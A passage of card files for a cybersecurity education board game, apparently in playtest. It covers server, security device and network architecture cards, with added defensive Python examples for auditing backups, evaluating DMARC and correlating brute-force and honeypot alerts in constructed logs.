  - Backups not regularly tested (recovery fails when needed)
  - Immutability not enforced (backups can be modified)
  - Access control: who can restore? Who can delete?

Defense Considerations:
  - CRITICAL: 3-2-1 backup strategy: 3 copies, 2 media types, 1 offsite
  - Immutable backups (WORM - Write Once Read Many)
  - Encryption at rest and in transit
  - Backup testing schedule (quarterly minimum)
  - Separate backup credentials (not domain-linked)
  - Offsite backup location (geographically separated)
  - Backup media inventory and audit log

Network Placement: Restricted segment + offsite (separate from primary network)

Interactions:
  - Used with Asset Card "Disaster Recovery"
  - Critical for Disaster Recovery module (backup resilience determines recovery speed)
  - If backup is missing or compromised, the team automatically FAILS the Disaster Recovery requirement (v2.2) — a CRITICAL gap carried into other modules
  - Incident Response mentions backup verification in defenses
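The defense considerations above are the kind of thing a backup audit script checks mechanically. The following is an added example, not part of the game's materials: it evaluates a constructed backup inventory for one system against the 3-2-1 rule, immutability, credential separation and the quarterly restore-test schedule named on the card. The inventory, site names and the 90-day test window are assumptions for the example.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional


@dataclass(frozen=True)
class BackupCopy:
    """One stored copy of a system's backup. Values used below are constructed sample data."""
    system: str
    media: str                      # e.g. "disk", "tape", "object-storage"
    location: str                   # site identifier
    offsite: bool                   # geographically separate from the primary site
    immutable: bool                 # WORM / object-lock style protection
    domain_joined: bool             # backup credentials tied to the production directory
    last_restore_test: Optional[date]


def check_321(copies: List[BackupCopy], today: date,
              max_test_age: timedelta = timedelta(days=90)) -> List[str]:
    """Evaluate the copies of one system against the 3-2-1 rule on the card
    (3 copies, 2 media types, 1 offsite) plus its other defense considerations:
    immutability, separate credentials and a restore test within the last quarter.
    Returns the list of findings; an empty list means the system passes."""
    findings = []
    if len(copies) < 3:
        findings.append(f"only {len(copies)} copies (need 3)")
    if len({c.media for c in copies}) < 2:
        findings.append("all copies on one media type (need 2)")
    if not any(c.offsite for c in copies):
        findings.append("no offsite copy (need 1)")
    if not any(c.immutable for c in copies):
        findings.append("no immutable copy (ransomware can modify every backup)")
    if any(c.domain_joined for c in copies):
        findings.append("backup credentials are domain-linked (a DC compromise reaches the backups)")
    tests = [c.last_restore_test for c in copies if c.last_restore_test is not None]
    if not tests or today - max(tests) > max_test_age:
        findings.append(f"no successful restore test within {max_test_age.days} days")
    return findings


# Constructed inventory for a single file server (not from the game materials).
TODAY = date(2026, 7, 15)

GOOD_INVENTORY = [
    BackupCopy("file-server", "disk", "hq", False, False, False, date(2026, 6, 1)),
    BackupCopy("file-server", "tape", "hq-vault", False, True, False, None),
    BackupCopy("file-server", "object-storage", "cloud-region-b", True, True, False, date(2026, 6, 1)),
]

# Two disk copies in the same room, written with domain-joined credentials, last tested months ago.
BAD_INVENTORY = [
    BackupCopy("file-server", "disk", "hq", False, False, True, date(2025, 11, 1)),
    BackupCopy("file-server", "disk", "hq", False, False, True, None),
]


def audit(inventories: Dict[str, List[BackupCopy]]) -> Dict[str, List[str]]:
    """Run check_321 over several systems and return {system: findings}."""
    return {name: check_321(copies, TODAY) for name, copies in inventories.items()}


if __name__ == "__main__":
    for name, findings in audit({"good": GOOD_INVENTORY, "bad": BAD_INVENTORY}).items():
        print(name, "PASS" if not findings else findings)
```

The second inventory fails every check at once, which is the shape of the "backup missing or compromised" gap the Disaster Recovery module penalizes: the copies exist, but nothing separates them from the primary systems or from the directory an attacker would already hold.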


SRV-08: Cloud Workload

Type: Increasingly Business Critical
Cost: 4 Budget
Capacity: 2 services
Complexity: 2/4 (but different concerns than on-premises)
Availability Requirement: 99% (vendor manages SLA)

Description: Cloud-hosted application or service (AWS EC2, Azure VM, GCP Compute Engine, or fully managed service like Lambda, Cloud Run). Shifts some infrastructure management to cloud provider but introduces new security concerns.

Key Concerns:
  - Misconfigured security groups/network ACLs (open to internet)
  - Cloud credentials compromise (AWS IAM keys stolen)
  - Instance metadata service attacks (AWS IMDS exploitation)
  - Cross-account or cross-tenant access (shared infrastructure)
  - Cloud-specific vulnerabilities (API, permissions models)
  - Data residency and compliance (where is data stored?)

Defense Considerations:
  - Cloud-native security tools (AWS Security Hub, Azure Security Center)
  - Proper IAM configuration (least privilege for cloud roles)
  - Network security groups with default-deny
  - Cloud workload protection (container runtime security)
  - VPC and subnet isolation
  - Encryption of cloud data

Network Placement: Cloud provider network (separate from on-premises, connected via VPN)

Interactions:
  - Used with Asset Card (varies—Email in cloud, Web in cloud, etc.)
  - Network design must include cloud connectivity (VPN or Direct Connect)
  - Audit module assesses cloud security posture
  - Cloud-specific Incident Response and Hardening challenges


SRV-09: Legacy System

Type: Business Important (Legacy)
Cost: 3 Budget
Capacity: 1 service
Complexity: 3/4 (difficult to maintain, patch, or secure)
Availability Requirement: 90% (supported but aging)

Description: Aging system running outdated OS (Windows XP, older Linux, proprietary systems) or custom applications. Cannot be easily patched due to compatibility issues, vendor no longer supporting, or critical business process depends on it.

Key Concerns:
  - Cannot patch due to vendor EOL (End of Life)
  - Incompatible with modern security tools (EDR won't run)
  - No TLS support (unencrypted traffic)
  - Known, publicly disclosed vulnerabilities with no fix
  - Business relies on it despite security risk
  - Migration cost exceeds security benefit (economically trapped)

Defense Considerations:
  - CRITICAL: Network Segmentation isolates legacy system
  - Firewall rules restrict legacy system traffic
  - Assume compromise and defend the segmented network (not the legacy system itself)
  - Monitor legacy system for suspicious activity (can't detect on system, detect on network)
  - Immutable backups to restore if compromised
  - Plan legacy system retirement

Network Placement: Isolated segment (strict firewall rules, minimal connectivity)

Interactions:
  - Used if organization has legacy infrastructure
  - Audit module finds legacy systems as critical findings
  - Network design: "assume legacy is compromised, defend around it"
  - Expansion deck explores legacy system challenges


SRV-10: Honeypot Decoy

Type: Security Tool (Non-Business)
Cost: 7 Budget
Capacity: 1 service (decoy only — hosts no real business service)
Complexity: 1/4 (purposefully simple and unmonitored-looking)
Availability Requirement: N/A (false resource)

Description: Deliberately exposed fake server or user account designed to detect compromise and lateral movement. Appears to be a real business resource but is actually a trap. Any access to honeypot indicates active attacker activity (zero false positives).

Key Concerns:
  - Placement visibility (attacker must discover it to trigger it)
  - Believability (must look like real system worth attacking)
  - Monitoring (honeypot access must be logged securely)
  - Honeypot maintenance (must not appear unmaintained)
  - Response procedures (what do we do when honeypot is triggered?)

Defense Considerations:
  - Canary tokens (watermarked documents, fake credentials)
  - Fake administrative account (admin account that isn't really admin)
  - Fake file server with sensitive-looking shares
  - Fake VIP email addresses on mailing lists
  - Alerting on any access to honeypot (immediate incident response)

Network Placement: Among legitimate resources (cannot appear isolated)

Interactions:
  - Used with Deception Technology defense card in Hardening
  - Network design: "place honeypots where attackers will likely look"
  - Zero false positives: any honeypot access = real attack
  - Expansion deck discusses advanced honeypot strategies


Server Card Summary

| Card | Server Type | Cost | Capacity | Complexity | Availability | Key Risk |
|------|-------------|------|----------|------------|--------------|----------|
| SRV-01 | Email Server | 8 | 1 | 2/4 | 99.9% | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | 1 | 2/4 | 99.5% | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | 1 | 3/4 | 99.9% | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | 2 | 2/4 | 99% | SMB Lateral Movement, Ransomware |
| SRV-05 | Domain Controller | 12 | 2 | 3/4 | 99.5% | Mimikatz, Complete Compromise |
| SRV-06 | Development | 5 | 3 | 2/4 | 80% | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | 1 | 2/4 | 95% | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | 2 | 2/4 | 99% | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | 1 | 3/4 | 90% | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot | 7 | 1 | 1/4 | N/A | Detection, Early Warning |

Gameplay Notes

Budget Considerations

Capacity & Overload (v2.2)

Complexity Considerations

Business Requirement Mapping

Each server fulfills one or more Asset Card requirements:
  - SRV-01 → Asset "Email"
  - SRV-02 → Asset "Web"
  - SRV-03 → Asset "Database"
  - SRV-04 → Asset "File Storage"
  - SRV-05 → Asset "Identity"
  - SRV-06 → Asset "Development"
  - SRV-07 → Asset "Disaster Recovery"
  - SRV-08 → Asset (varies—could be Email, Web, Database in cloud)
  - SRV-09 → Asset (legacy system supporting specific business function)
  - SRV-10 → Security monitoring (not a business requirement)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by business criticality:
     - Red: SRV-03, SRV-05, SRV-07 (Business Critical - cannot lose)
     - Yellow: SRV-01, SRV-02, SRV-04 (Important - high impact if down)
     - Blue: SRV-06, SRV-08, SRV-09 (Business Important - can work around)
     - Green: SRV-10 (Security Tool - special purpose)
  3. Cut along dotted lines
  4. Consider creating a separate "Server Reference Card" with costs, capacity, and complexity for quick lookup

Network Building Module: Server Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/core-deck/security-device-cards.md

Network Building Module: Security Device Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Security Device Cards represent network security appliances and tools that control traffic, detect threats, and enforce policies between network segments.


Security Device Cards

SEC-01: Firewall (Perimeter)

Type: Perimeter Control
Cost: 12 Budget
Placement: Network edge (between internet and internal network)
Primary Function: Block unauthorized inbound/outbound traffic

Description: Traditional stateful firewall (Cisco ASA, Palo Alto Networks, Fortinet FortiGate) at network perimeter. Enforces allow/deny rules based on source IP, destination IP, protocol, and port. First line of defense against external attacks.

What It Protects Against:
  - Unauthorized inbound access attempts
  - Unauthorized outbound connections (C2 beaconing, data exfiltration)
  - Network reconnaissance from internet
  - DDoS attacks (basic flood protection)

What It Doesn't Protect Against:
  - Application-layer attacks (SQL injection, XSS)
  - Lateral movement within network (operates at L3/L4 only)
  - Encrypted traffic inspection (needs deep packet inspection)
  - Insider threats or authorized-but-malicious access

Network Interactions:
  - Required for: Most organizations (perimeter protection is baseline)
  - Works with: Web Server (must allow inbound HTTP/HTTPS), Email Server (SMTP/POP3/IMAP)
  - Supports: Database (prevents inbound database connections from internet)

Ruleset Complexity: Medium (5-10 rules for basic setup, 50+ for mature organization)

Performance Impact: Minimal for small networks, can become bottleneck at scale


SEC-02: Intrusion Detection System (IDS)

Type: Threat Detection
Cost: 10 Budget
Placement: Internal network (behind firewall, in front of critical systems)
Primary Function: Detect suspicious network traffic patterns

Description: Network-based IDS (Snort, Zeek, Suricata) that inspects all traffic and alerts on suspicious patterns. Uses signature matching and/or behavioral analysis to identify known attacks and anomalous traffic.

What It Protects Against:
  - Known attack patterns (exploits, vulnerability scans)
  - Port scanning and reconnaissance
  - Lateral movement (SMB, RDP abuse)
  - Data exfiltration patterns (unusual volume, unusual destination)
  - Command & Control (C2) communication

What It Doesn't Protect Against:
  - Zero-day exploits (no signature exists)
  - Encrypted traffic inspection (needs decryption)
  - Insider threats (authorized users on authorized systems)
  - Application-layer attacks (SQL injection, XSS still pass through)

Network Interactions:
  - Works with: SIEM (IDS alerts feed into SIEM for correlation)
  - Supports: Detection of T-04 (Lateral Movement), T-09 (C2 Beaconing) in Incident Response
  - Complements: IPS (IDS detects, IPS blocks; often paired)

Signature Maintenance: High (requires weekly/daily signature updates from threat intelligence)

Performance Impact: Medium (packet inspection adds latency, can slow network)


SEC-03: Intrusion Prevention System (IPS)

Type: Threat Prevention
Cost: 14 Budget
Placement: Internal network (actively blocks malicious traffic)
Primary Function: Block suspicious traffic in real-time

Description: Network-based IPS (actively protective version of IDS). Can block traffic in addition to alerting. Inline placement allows real-time threat blocking.

What It Protects Against:
  - Everything IDS protects against (detection + blocking)
  - Exploit attempts against known vulnerabilities
  - Worm propagation
  - Policy violations

What It Doesn't Protect Against:
  - Same limitations as IDS, plus:
    - False positive blocking (can block legitimate traffic)
    - Encrypted traffic inspection limitations
    - Zero-day exploits

Network Interactions:
  - Works with: WAF on web traffic (IPS for network, WAF for applications)
  - Works with: Firewall (layered network defense)
  - Supports: Defense against T-02 (Watering Hole), T-05 (Kernel Exploit) in Incident Response

Tuning Complexity: High (false positives require tuning; too aggressive = blocks legitimate traffic)

Performance Impact: Medium-High (real-time inspection + blocking adds latency)

Risk: Misconfigured IPS can block critical business traffic


SEC-04: Load Balancer

Type: Availability & Performance
Cost: 8 Budget
Placement: In front of multiple web servers
Primary Function: Distribute traffic across multiple servers

Description: Load balancer (F5, Citrix NetScaler, nginx, HAProxy) distributes incoming traffic across multiple backend servers. Increases availability and performance.

What It Protects Against:
  - Single server failure (if one web server fails, traffic routes to others)
  - DDoS attacks (distributes attack traffic across multiple servers)
  - Overload attacks (can queue excess requests)

What It Doesn't Protect Against:
  - Application vulnerabilities
  - Malicious traffic targeting multiple backends
  - Session hijacking
  - Backend compromise (load balancer can't protect compromised backend)

Network Interactions:
  - Requires: Web Server (needs multiple instances for load balancing to make sense)
  - Works with: Web Server redundancy (2+ web servers behind load balancer)
  - Supports: Web application availability in Incident Response scenarios

Health Check Mechanism: Monitors backend servers; removes unhealthy servers automatically

Cost-Benefit: Low cost (8 Budget) but high value if you have multiple web servers


SEC-05: VPN Gateway

Type: Remote Access Control
Cost: 9 Budget
Placement: Network perimeter (between internet and internal network)
Primary Function: Secure remote access for employees/contractors

Description: VPN concentrator (Cisco AnyConnect, Palo Alto Prisma Access, F5 BIG-IP) that creates encrypted tunnels for remote users. Allows employees to securely access internal resources from outside network.

What It Protects Against:
  - Man-in-the-middle attacks on remote user traffic
  - Credential interception (traffic encrypted)
  - Unauthorized access to internal resources (authentication required)
  - IP spoofing (tunnel validates source)

What It Doesn't Protect Against:
  - Weak VPN credentials (still vulnerable to brute force)
  - Compromised endpoint connecting via VPN (malware on home computer)
  - Insider threats (authorized user with legitimate credentials)
  - Application vulnerabilities accessed through VPN

Network Interactions:
  - Works with: Domain Controller (VPN user auth)
  - Works with: MFA (VPN should require MFA)
  - Supports: Remote work scenarios (necessary for distributed teams)

Authentication Complexity: Requires MFA for security (otherwise easy brute force)

Cost-Benefit: Necessary for remote work, but alone insufficient (needs MFA)


SEC-06: Email Gateway

Type: Email Security
Cost: 6 Budget
Placement: Network perimeter (filters incoming/outgoing email)
Primary Function: Filter spam, phishing, and malware in email

Description: Email security appliance (Proofpoint, Mimecast, Cisco Email Security) that filters all incoming/outgoing email. Scans for phishing, malware, data exfiltration attempts.

What It Protects Against:
  - Phishing emails (signature and behavior-based detection)
  - Email-based malware (attachments, links)
  - Spam (reduces alert fatigue)
  - Data exfiltration via email (DLP for email)
  - Email spoofing (validates SPF/DKIM/DMARC)

What It Doesn't Protect Against:
  - User clicks on phishing links (user training needed)
  - Advanced phishing with legitimate credentials
  - Compromised internal email account sending from inside
  - Zero-day malware in attachments

Network Interactions:
  - Works with: Email Server (filters before reaching server)
  - Works with: User Security Training (filters + training = defense-in-depth)
  - Supports: Defense against T-01 (Phishing) in Incident Response

Signature Maintenance: Very high (email threats change daily)

User Experience Impact: Email delays (milliseconds) are imperceptible; false positives = missed emails
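The spoofing check the card lists, "validates SPF/DKIM/DMARC", is where most gateway configuration mistakes hide, so here is how the DMARC decision is actually made once SPF and DKIM have been evaluated. This is an added example, not code from the game or from any gateway vendor. It assumes the SPF and DKIM verdicts have already been computed by the gateway; the organizational-domain logic is a simplification (last two labels), where real evaluators consult the Public Suffix List, and all domains and results are constructed.

```python
from dataclasses import dataclass
from typing import Dict, Optional


def org_domain(domain: str) -> str:
    """Organizational domain approximated as the last two DNS labels.
    Assumption for this example; real evaluators use the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_aligned(auth_domain: Optional[str], from_domain: str, mode: str) -> bool:
    """DMARC identifier alignment: strict ('s') requires an exact match with the
    visible From: domain, relaxed ('r') accepts the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def parse_dmarc(txt: str) -> Dict[str, str]:
    """Parse a DMARC TXT record such as 'v=DMARC1; p=reject; adkim=s' into tags,
    applying the protocol defaults (p=none, relaxed alignment for both identifiers)."""
    tags = {"p": "none", "adkim": "r", "aspf": "r"}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    if tags.get("v") != "dmarc1":
        raise ValueError("not a DMARC record")
    return tags


@dataclass(frozen=True)
class AuthResults:
    """Authentication results the gateway already computed for one message."""
    from_domain: str             # domain of the visible From: header
    spf_result: str              # "pass", "fail", "none", ...
    spf_domain: Optional[str]    # envelope (MAIL FROM) domain SPF was evaluated for
    dkim_result: str
    dkim_domain: Optional[str]   # d= tag of the verified DKIM signature


def evaluate_dmarc(results: AuthResults, record: str) -> Dict[str, object]:
    """Combine SPF and DKIM with the sender domain's DMARC policy. A message passes
    if either identifier both authenticated and aligned with the From: domain;
    otherwise the record's p= tag is the disposition the gateway should apply."""
    policy = parse_dmarc(record)
    spf_ok = results.spf_result == "pass" and is_aligned(results.spf_domain, results.from_domain, policy["aspf"])
    dkim_ok = results.dkim_result == "pass" and is_aligned(results.dkim_domain, results.from_domain, policy["adkim"])
    passed = spf_ok or dkim_ok
    return {
        "dmarc": "pass" if passed else "fail",
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "disposition": "none" if passed else policy["p"],
    }


# Constructed sample messages; example.com is the protected domain, other names are placeholders.
LEGITIMATE = AuthResults("example.com", "pass", "mail.example.com", "pass", "example.com")
# Spoof: SPF passes for the sender's own envelope domain, but nothing aligns with From:.
SPOOFED = AuthResults("example.com", "pass", "bulk-sender.invalid", "none", None)
# Subdomain signature: authenticates, but only aligns under relaxed DKIM mode.
SUBDOMAIN_SIGNED = AuthResults("example.com", "none", None, "pass", "mail.example.com")

RELAXED_REJECT = "v=DMARC1; p=reject; adkim=r; aspf=r"
STRICT_QUARANTINE = "v=DMARC1; p=quarantine; adkim=s; aspf=s"

if __name__ == "__main__":
    for name, msg in [("legitimate", LEGITIMATE), ("spoofed", SPOOFED), ("subdomain", SUBDOMAIN_SIGNED)]:
        print(name, evaluate_dmarc(msg, RELAXED_REJECT), evaluate_dmarc(msg, STRICT_QUARANTINE))
```

The spoofed case is the one to notice: SPF returns "pass" because the bulk sender's envelope domain really does authorize that server, and a gateway that only looks at the SPF verdict without checking alignment against the From: header will let it through. The strict-mode case shows the other failure direction, where a legitimately signed subdomain gets quarantined because the policy owner chose `adkim=s`.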


SEC-07: Web Application Firewall (WAF)

Type: Application-Layer Protection
Cost: 11 Budget
Placement: In front of web server
Primary Function: Block application-layer attacks (SQL injection, XSS, etc.)

Description: Web Application Firewall (ModSecurity, Cloudflare WAF, AWS WAF) that inspects HTTP traffic and blocks malicious payloads. Understands web application protocols unlike traditional firewall.

What It Protects Against:
  - SQL injection attacks
  - Cross-site scripting (XSS)
  - Cross-site request forgery (CSRF)
  - Remote code execution (RCE)
  - Malicious file uploads
  - Buffer overflows in web apps

What It Doesn't Protect Against:
  - Logic flaws in application (WAF can't fix broken business logic)
  - Authenticated attacks (user is authorized)
  - Distributed attacks across many IPs (WAF can't distinguish)
  - Zero-day application vulnerabilities (no rule exists)

Network Interactions:
  - Requires: Web Server (only protects web traffic)
  - Works with: IPS (network-level and application-level defense)
  - Supports: Defense against T-02 (Watering Hole) in Incident Response

Rule Maintenance: Medium (OWASP rules are standardized, vendor maintains them)

False Positive Rate: Medium (needs tuning for specific web application)

Performance Impact: Medium (application inspection adds latency)


SEC-08: Network Segmentation Switch

Type: Network Architecture Control
Cost: 10 Budget
Placement: Internal network (between segmented network zones)
Primary Function: Enforce network segmentation via VLANs and ACLs

Description: Layer 3 switch or router configured for network segmentation. Implements VLANs (virtual LANs) and layer 3 filtering to separate network into zones (DMZ, User segment, Server segment, Admin segment).

What It Protects Against:
  - Lateral movement via SMB and other internal protocols
  - Credential dumping spread (isolated networks can't reach DCs)
  - Compromised user system accessing servers directly
  - Insider threats (restrictions on data access)
  - Data exfiltration to external media (if USB segment is isolated)

What It Doesn't Protect Against:
  - Attacks within same segment (switch can't prevent user↔user attacks)
  - Routing around segmentation (if misconfigured)
  - Physical network attacks (layer 1 problems)
  - Encrypted tunneling out of segment (if firewall rule allows)

Network Interactions:
  - Works with: Firewall (firewall rules enforce segmentation policies)
  - Works with: Database Server (database in isolated segment)
  - Works with: Zero Trust (segmentation is prerequisite for zero trust)
  - Supports: Defense against T-04 (Lateral Movement) in Incident Response

Configuration Complexity: High (requires planning of segment boundaries and rules)

Cost-Benefit: Very high ROI (prevents lateral movement for 10 Budget)


SEC-09: SIEM (Security Information & Event Management)

Type: Threat Monitoring & Investigation
Cost: 15 Budget
Placement: Central monitoring (logs from all devices)
Primary Function: Aggregate logs and detect threats via correlation

Description: Enterprise SIEM (Splunk, Elastic, QRadar, ArcSight) that collects logs from all systems, correlates events, and alerts on suspicious patterns. Foundation of mature incident response program.

What It Protects Against:
  - Multi-step attack patterns (correlation finds chains)
  - Persistence mechanisms (scheduled tasks, registry changes logged)
  - Credential abuse (failed login spikes)
  - Insider threats (excessive file access, off-hours activity)
  - Data exfiltration (unusual volume to unusual destination)

What It Doesn't Protect Against:
  - Attacks happening faster than SIEM ingests logs
  - False negatives (misconfigured rules miss attacks)
  - Encrypted traffic inspection (needs decryption)
  - Malware on endpoint (needs EDR, not SIEM)

Network Interactions:
  - Requires: Log Centralization deployment (needs logs to analyze)
  - Works with: IDS/IPS alerts (SIEM correlates with network alerts)
  - Supports: Incident Response investigation (SIEM data essential for forensics)
  - Critical for: Hardening module detection (SIEM detects Pentester Tactics)

Data Requirements: Massive (can be 10+ GB/day for large organizations)

Maintenance: Very high (tuning rules, managing data retention, responding to false positives)

Value: Essential for organizations that need incident detection


SEC-10: Honeypot Network

Type: Deception & Detection
Cost: 8 Budget
Placement: Isolated segment (mimics legitimate infrastructure)
Primary Function: Detect lateral movement and reconnaissance

Description: Network of decoy systems (not SRV-10 honeypot server, but entire segment) designed to attract attackers. Any access to honeypot network indicates active attacker.

What It Protects Against:
  - Lateral movement (attacker triggers honeypot while exploring)
  - Network reconnaissance (if honeypot is discovered)
  - Ransomware spread (if honeypot is in ransomware path)
  - Insider reconnaissance (any access to honeypot = red flag)

What It Doesn't Protect Against:
  - Attacks that don't trigger honeypot (if attacker follows direct path)
  - Honeypot visibility (attacker must find it to trigger it)
  - False positives (must be designed to avoid accidental triggers)

Network Interactions:
  - Works with: Network Segmentation (honeypot in isolated but accessible segment)
  - Works with: SIEM (honeypot triggers feed into SIEM)
  - Supports: Detection in Hardening module (Deception Technology defense)

Maintenance: Medium (must keep honeypot looking alive and attractive)

Cost-Benefit: Low cost (8 Budget) with high detection value (zero false positives)
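SEC-09 says the SIEM's value is correlation ("failed login spikes", "correlation finds chains"), and SEC-10 and SRV-10 say honeypot triggers should feed into it with zero false positives. The following added example, which is not part of the game or of any SIEM product, runs both kinds of rule over a constructed log sample: a threshold-plus-sequence rule for brute force followed by a successful login, and an unconditional rule for any event that touches a decoy host or decoy account. The log line format, host names, account names and the 5-failures-in-10-minutes threshold are all assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# One-event-per-line format assumed for this example (constructed, not a real SIEM schema).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) event=(?P<event>\S+) src=(?P<src>\S+)$"
)

# Decoy assets: a fake file server (SRV-10 style) and a fake admin account. Names are placeholders.
DECOY_HOSTS = {"fs-finance-old"}
DECOY_ACCOUNTS = {"svc_backup_admin"}


def parse_events(lines: List[str]) -> List[Dict]:
    """Parse raw lines into event dicts sorted by time; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def correlate(events: List[Dict], threshold: int = 5,
              window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Two rules of the kind a SIEM runs over centralized logs:
    1. honeypot-access: any event touching a decoy host or decoy account fires at once;
       no legitimate activity should ever reach a decoy, so there is nothing to threshold.
    2. bruteforce-then-success: at least `threshold` failed logins for the same user from
       the same source inside `window`, followed by a successful login from that source."""
    alerts = []
    failures = defaultdict(list)   # (user, src) -> timestamps of recent failed logins
    for e in events:
        if e["host"] in DECOY_HOSTS or e["user"] in DECOY_ACCOUNTS:
            alerts.append({"rule": "honeypot-access", "ts": e["ts"], "user": e["user"],
                           "host": e["host"], "src": e["src"]})
        key = (e["user"], e["src"])
        if e["event"] == "login_failed":
            failures[key].append(e["ts"])
        elif e["event"] == "login_success":
            recent = [t for t in failures[key] if e["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"rule": "bruteforce-then-success", "ts": e["ts"], "user": e["user"],
                               "host": e["host"], "src": e["src"], "failures": len(recent)})
            failures[key] = []     # a success closes the sequence either way
    return alerts


# Constructed log sample: alice's account is guessed from one source until a login succeeds,
# bob mistypes his password once, and the same source later opens a share on the decoy server
# and tries the decoy admin account against the domain controller.
SAMPLE_LOG = """
2026-07-15T09:00:01 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:00:07 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:00:13 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:00:19 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:00:25 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:00:31 host=fs01 user=alice event=login_failed src=10.1.5.20
2026-07-15T09:01:02 host=fs01 user=alice event=login_success src=10.1.5.20
2026-07-15T09:03:40 host=fs01 user=bob event=login_failed src=10.1.5.44
2026-07-15T09:03:52 host=fs01 user=bob event=login_success src=10.1.5.44
2026-07-15T09:12:10 host=fs-finance-old user=carol event=smb_open src=10.1.5.20
2026-07-15T09:14:05 host=dc01 user=svc_backup_admin event=login_failed src=10.1.5.20
this line is not in the expected format and is skipped
""".strip().splitlines()


def detect(lines: List[str]) -> List[Dict]:
    """Parse and correlate in one call; returns the alert list."""
    return correlate(parse_events(lines))


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Note that bob's single typo produces nothing, while the decoy rules fire on a single event each: that asymmetry is the point of the Deception Technology defense. Because both alert types carry the same `src`, an analyst can chain them into one incident, which is the "correlation finds chains" claim on the SIEM card.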


Security Device Summary

| Card | Device Type | Cost | Primary Vectors | Placement |
|------|-------------|------|-----------------|-----------|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL | Perimeter |
| SEC-02 | IDS | 10 | MALWARE, NETWORK | Internal |
| SEC-03 | IPS | 14 | MALWARE, WEB, NETWORK | Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) | Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK | Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE | Perimeter |
| SEC-07 | WAF | 11 | WEB, MALWARE | Web Tier |
| SEC-08 | Network Segmentation | 10 | CREDENTIAL, NETWORK | Internal |
| SEC-09 | SIEM | 15 | Multiple (detection) | Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) | Isolated |

Cost-Benefit Analysis

Tier 1 (Essential for Any Organization)

Tier 2 (Advanced Organizations)

Tier 3 (Specialized Protections)


Gameplay Strategy Notes (v2.2)

Budgets are 40-60 by difficulty (Beginner 60 / Standard 50 / Advanced 40), and the Required servers eat most of it — plan security spending around what's left.

Beginner (Budget: 60)

Standard (Budget: 50)

Advanced (Budget: 40)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by OSI layer:
     - Red (Layer 3-4, Network): SEC-01, SEC-02, SEC-03, SEC-08, SEC-10
     - Orange (Layer 7, Application): SEC-07
     - Yellow (Specialized): SEC-04, SEC-05, SEC-06
     - Blue (Central): SEC-09
  3. Cut along dotted lines
  4. Create a "Device Reference Card" with costs, network placement, and primary protections for quick lookup during gameplay

Network Building Module: Security Device Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/core-deck/architecture-cards.md

Network Building Module: Architecture Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Architecture Cards represent different network topology and design patterns. Each organization selects ONE architecture that determines how network segments are organized and how traffic flows between them.


Architecture Options

ARCH-01: Flat Network (Traditional)

Cost: 0 Budget
Complexity: 1/5 (very simple)
Security Posture: Low
Performance: High (no routing/switching overhead)

Description: All systems connected to same network segment (same subnet, same broadcast domain). No network segmentation—everything can talk to everything. Traditional small office network.

Network Design:

Internet → Firewall → Switch
                      ├─ Email Server
                      ├─ Web Server
                      ├─ Database Server
                      ├─ File Server
                      ├─ Domain Controller
                      └─ User Workstations

Characteristics:
  - All systems on same IP subnet (e.g., 192.168.1.0/24)
  - Single broadcast domain
  - No layer 3 routing between segments
  - Firewall only at perimeter, not internal

What This Means for Security:
  - Advantages: Simple to set up and manage, low cost
  - Disadvantages: Lateral movement is trivial (attacker on user system can reach database server directly)
  - Implication: If any system is compromised, entire network is at risk

Who Uses This:
  - Small offices with <50 people
  - Non-security-sensitive organizations
  - Organizations where ease of use matters more than security

Defenses Required:
  - Stronger endpoint protection (must protect each individual system)
  - User security training (social engineering becomes primary attack vector)
  - Cannot rely on network-level controls

Against Incident Response Threats:
  - T-04 (Lateral Movement): Trivially successful (same network)
  - T-06 (Mimikatz): Once DC is compromised, entire network is accessible
  - T-11 (Data Exfil): No segmentation to stop data movement


ARCH-02: Segmented 3-Zone (DMZ Model)

Cost: 5 Budget
Complexity: 2/5 (simple but requires planning)
Security Posture: Medium
Performance: Medium (slight routing overhead)

Description: Network divided into three logical zones with firewall rules between them. This is the most common network architecture for medium-sized organizations.

